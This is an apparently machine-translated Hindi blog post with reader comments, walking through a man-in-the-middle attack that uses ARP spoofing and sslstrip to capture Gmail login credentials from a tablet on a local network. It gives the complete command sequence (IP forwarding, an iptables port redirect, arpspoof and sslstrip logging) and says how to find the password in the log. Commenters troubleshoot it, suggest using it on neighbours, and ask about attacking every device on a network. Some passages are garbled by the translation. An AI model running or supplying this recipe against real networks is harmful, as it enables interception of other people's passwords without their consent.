नमस्कार ब्लॉगर्स।
आज के लिए मेरे पास इस बात का एक छोटा सा नमूना है कि बिना किसी सुरक्षा के किसी भी नेटवर्क में जुड़ा जाना कितना खतरनाक हो सकता है, जो हममें से कई लोग पसंद करते हैं।
आज के लिए, मैं Gmail पासवर्ड प्राप्त करने के लिए Sslstrip के साथ ArpSpoofing का उपयोग करने जा रहा हूं। पर्यावरण को अधिक नियंत्रित करने के लिए, मैंने एक खाता बनाया है जिसे "testarp@gmail.com".
और चूंकि मुझे प्रस्तावना बहुत पसंद नहीं है, इसलिए व्यापार के लिए नीचे उतरें।
वातावरण
इस परीक्षण के लिए हमारे पास निम्नलिखित हैं:
1. हमलावर: यह मेरा डेस्कटॉप या डेस्कटॉप कंप्यूटर है जिसमें डेबियन व्हीज़ी है। रिपॉजिटरी से आप इंस्टॉल कर सकते हैं एसएसएलस्ट्रिप y डीएसएनिफ पाने के लिए आर्सेपोफिंग
2. पीड़ित: पीड़ित एक एंड्रॉइड टैबलेट है जो केवल ब्राउज़र के माध्यम से अपना मेल देखना चाहता है।
3. माध्यम: बीच मेरा है सिस्को DPC2425 राउटर
ADDRESSES।
हमलावर का पता: 172.26.0.2
राउटर का पता: 172.26.0.1
पीड़ित का पता: 172.26.0.8
हमला:
इस हमले के लिए हम पहली चीज यह करेंगे कि हम आगे सक्रिय हो जाएं ताकि हमारा कंप्यूटर पीड़ित को बिना उसकी जानकारी के आगे की सूचना दे सके। (अन्यथा यह सेवाओं के हमले से इनकार होगा)
उसके लिए हम उपयोग करेंगे:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
अब अगर हम टेल-एफ करते हैं desdelinux हम जानकारी को लाइव और प्रत्यक्ष देखते हैं
तो फिर हम जो चाहते हैं वह कैसे मिलता है?
आइए सबसे पहले टेबलेट पर अपना मेल डालें। लॉग इन करते समय, हम देखते हैं कि हजारों और हजारों चीजें हमारे कंसोल पर दिखाई देती हैं।
अब जब यह समाप्त हो गया है तो आइए अपनी फ़ाइल खोलें ”desdelinuxनैनो के साथ
nano desdelinux
नियंत्रण + डब्ल्यू के साथ हम SECURE POST नामक कुछ खोजते हैं।
और हम कुछ इस तरह देखेंगे।
उस विशाल रेखा के बीच जिसे देखा नहीं जा सकता है, वह पीड़ित का ईमेल और पासवर्ड है।
इसलिए हम दाईं ओर भागते हैं जब तक हम अंत में सुरंग के अंत में प्रकाश को नहीं देखते हैं।
एक अन्य अवसर पर हम देखेंगे कि हम इन हमलों से खुद को कैसे बचा सकते हैं।
सादर
मैं यह कहने का अवसर लेता हूं कि जब पोस्ट प्रकाशित किया गया था, तो आदेश सही नहीं थे।
अंत में iptables कमांड 8080 को याद कर रहा है जो दूसरी लाइन पर है। और फिर arpspoof कमांड सभी एक ही लाइन पर थे। प्रत्येक कमांड एक अलग लाइन पर है।
उम्मीद है कि संपादक इसे देखता है और इसे ठीक कर सकता है।
नमस्ते.
मैंने आपके द्वारा किए गए सुधार किए हैं, क्या यह ठीक है?
यदि आप किसी पसंदीदा प्रविष्टि में कोड सम्मिलित करने जा रहे हैं, तो HTML दृश्य का उपयोग करें, और सत्यापित करें कि लंबित भेजने से पहले लेख सही है। धन्यवाद।
यह जानना बहुत कठिन है कि हममें से जिन्हें कोई ज्ञान नहीं है, वे इतने कमजोर हैं। बहुत अच्छी जानकारी तब भी जब मैं उस विषय को बहुत कम समझता हूं जिसका मुझे महत्व है। धन्यवाद!
सादर
लेकिन यह तभी काम करता है जब हमलावर और पीड़ित एक ही नेटवर्क पर हों। किसी भी स्थिति में, मुझे यह प्रतीत होता है कि यदि (उसी नेटवर्क पर) आप HTTPS का उपयोग करके कनेक्ट होते हैं जो कि नहीं होता है क्योंकि डेटा को आपके मशीन से बाहर जाने से पहले एन्क्रिप्ट किया गया है। यदि आप HTTP (S के बिना) से जुड़ते हैं, तो मुझे लगता है कि नेटवर्क केबल को देखते हुए भी आप चाबियाँ देखते हैं।
यह सच नहीं है। मैं एक gmail पासवर्ड हैक कर रहा हूँ और अगर आप gmail नोटिस करते हैं तो वह https का उपयोग करता है। इसलिए? मुद्दा यह है कि हालांकि https सुरक्षित है, यह http पर निर्भर करता है। इसलिए यह इतना सुरक्षित नहीं है।
किसी https के बारे में इतना मत मानिए कि S सुपरमैन के लिए नहीं है, यह "सुरक्षित" के लिए है
यह https के साथ या इसके बिना काम करता है, मैंने इसे एक अधिक विशिष्ट linux distro के साथ आज़माया है और यह बिना किसी समस्या के काम करता है
आप इसका उपयोग उन लोगों को सबक सिखाने के लिए कर सकते हैं जो आपका वाई-फाई चोरी करते हैं। 😀
यह कमोबेश वैसा ही है जैसा कि उन्होंने बहुत पहले चेमा अलोंसो के ब्लॉग पर कहा था:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
ओस्टिया, यह क्या करता है महान! / और फिर वे हर बार जब मैं बैंक खाते की जांच करने के लिए जाते हैं तो मैं वीपीएन का उपयोग करता हूं।))। वैसे, आपको देखना होगा कि टिप्पणी में निंदक कैसे हैं ... अगर अंत में यह चोरी कर रहा है ...
अब हमें अपनी स्वयं की वीपीएन सेवा बनाने और पेश करने के तरीके के बारे में एक ट्यूटोरियल लेने की आवश्यकता है।
आपके द्वारा लिंक की गई कहानी बहुत ही रोचक है, यहां तक कि यह एक उपन्यास पुस्तक के योग्य है, और यह मुझे याद है जब मैंने अपने पड़ोसियों के इंटरनेट का उपयोग किया था और हालांकि मैं कहता हूं कि मैं इस विषय को जानता हूं, मुझे लगता है कि मैं कभी भी सही आयाम नहीं देख सकता। मेरे लिए सौभाग्य से जो खतरा हो सकता था, उन्होंने केवल WPA2 का पासवर्ड बदल दिया और यहीं से ISP के साथ मेरी कहानी शुरू हुई
इसलिए शीर्षक एक्शन में Sllstrip का कहना है।
यह तब तक काम करता है, जब तक हमलावर बीच में है
आप प्रिज्म में किस तरंग पर काम करते हैं? -
नं.
आप अपना अनुरोध XD भेजने के लिए क्या इंतजार कर रहे हैं
का संबंध है
अच्छी पोस्ट
दिलचस्प है, मैं बाद में एक शैक्षिक परीक्षण करूँगा ... शायद मैं भी वाईफाई को पासवर्ड हटा सकता हूं और थोड़ा educational के लिए मज़े कर सकता हूं
किसी भी तरह से, क्या आप अनुरोध किए गए लक्ष्य के लिए अलग-अलग पृष्ठ भेजने के लिए कुछ ऐसा ही कर सकते हैं? उदाहरण के लिए, वे फेसबुक खोलना चाहते हैं और मैं उन्हें Google पर पुनर्निर्देशित करूं? 😛
हाँ। लेकिन यह सब बहुत अलग रोल है।
शायद बाद में पोस्ट कर दूंगा।
बहुत अच्छी पोस्ट, ये विषय बहुत ही शैक्षिक हैं, अब हमें इस हमले का मुकाबला करने में सक्षम होने की आवश्यकता है, क्योंकि कुछ (जैसे मैं) सार्वजनिक नेटवर्क (उदाहरण के लिए विश्वविद्यालय) से जुड़ते हैं, इससे बचने में मदद मिलेगी।
नमस्ते!
यह मेरे लिए काम नहीं किया 🙁
मुझे यहां कुछ भी विफल हो जाता है, इस तथ्य के अलावा कि सर्वर कनेक्शन के माध्यम से https कनेक्शन एन्क्रिप्ट किए जाते हैं (एक बार आपके मशीन पर प्रमाण पत्र होने के बाद, आपका ब्राउज़र एन्क्रिप्शन का प्रभारी है) iptables के साथ आप पोर्ट 80 (http) को पुनर्निर्देशित करते हैं, न कि 443 जो कि https है
मैंने भी यही सोचा था। मुद्दा यह है कि हालांकि https "सुरक्षित" है यह दुर्भाग्य से http पर निर्भर करता है। तो sslstrip इसका लाभ उठाता है, यह ब्राउज़र को विश्वास दिलाता है कि यह https क्रेडेंशियल्स का उपयोग कर रहा है लेकिन ऐसा नहीं है।
पवित्र बकवास! लेकिन ब्राउज़र को एक चेतावनी देखनी चाहिए जैसे "यह प्रमाणपत्र एक संदिग्ध साइट से आता है या ऐसा कुछ" "... मुझे निश्चित रूप से परीक्षण करना होगा XD
नहीं, बिल्कुल कुछ भी नहीं निकलता है।
यह आखिरकार मेरे लिए काम कर गया
मैं पासवर्ड के साथ एक WEP नेटवर्क पर जुड़ा हुआ हूं, और इसने मुझे सीधे वैसे भी पासवर्ड दिखाया।
एक प्रश्न। क्या आप एक ही प्रक्रिया कर सकते हैं लेकिन सभी कंप्यूटरों के लिए जो नेटवर्क में जुड़े हुए हैं, बजाय एक ही शिकार के?
हाँ आप कर सकते हैं। लेकिन मैंने प्रयोग नहीं किए हैं। इसे स्वयं आज़माएं और हमें बताएं कि आप कैसे कर रहे हैं।
इसके साथ केवल एक चीज यह है कि पीड़ित की मशीन ऑफ़लाइन हो जाती है, लेकिन sslstrip मुझे कुछ भी नहीं दिखाता है: /
आपको एक पल के लिए फ़ायरवॉल को अक्षम करना होगा। या कम से कम आने वाले कनेक्शन को सक्षम करें।
जांच और मैं केवल फेसबुक पेज का उपयोगकर्ता नाम और पासवर्ड देख सकता था, जीमेल में मुझे लॉग में कोई परिणाम नहीं मिला, मुझे भी केवल arpspoof «arpspoof -i -t« की एक पंक्ति की आवश्यकता थी। दूसरी ओर, पीड़ित मशीन कुछ पृष्ठ नहीं खोल सकी। मैं जांच जारी रखूंगा, यह बहुत दिलचस्प है। मंज़रो का उपयोग करने वालों के लिए एक सहायता, स्थापित करने के लिए पैकेज हैं: dsniff (यहाँ arpspoff), मुड़ और python2-pyopenssl। Sslstrip को यहाँ से डाउनलोड किया जा सकता है: http://www.thoughtcrime.org/software/sslstrip/
इसे चलाने के लिए $ python2 sslstrip.py
नमस्ते.
यह बाहर नहीं आया लेकिन arpspoof लाइन है: #arpspoof -i int -t ip-पीड़ित आईपी-राउटर
देखो मैं वही करता हूँ जो तुम कहते हो:
इको "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp -destination-port 80 -j REDIRECT –to-port 8080
आर्स्पूफ -आई एथ0 -टी 172.26.0.8 172.26.0.1
आर्स्पूफ -आई एथ0 -टी 172.26.0.1 172.26.0.2
समस्या यह है कि पीड़ित जो एक और पीसी है जो मैं अपने कमरे में यहां रखता हूं, मेरे पास उस बिंदु से कोई संबंध नहीं है जो मुझे राउटर को पुनरारंभ करना है, मैं क्या कर सकता हूं।
एक और बात मैं एक वर्चुअल मशीन के साथ काम कर रहा हूं, और जब मैं iwconfig कमांड निष्पादित करता हूं, तो wlan0 प्रकट नहीं होता है, और न ही जब मैं ifconfig निष्पादित करता हूं, हालांकि अगर मेरे पास अपने वर्चुअल मशीन पर इंटरनेट है तो एक eth0 इंटरफ़ेस क्या है।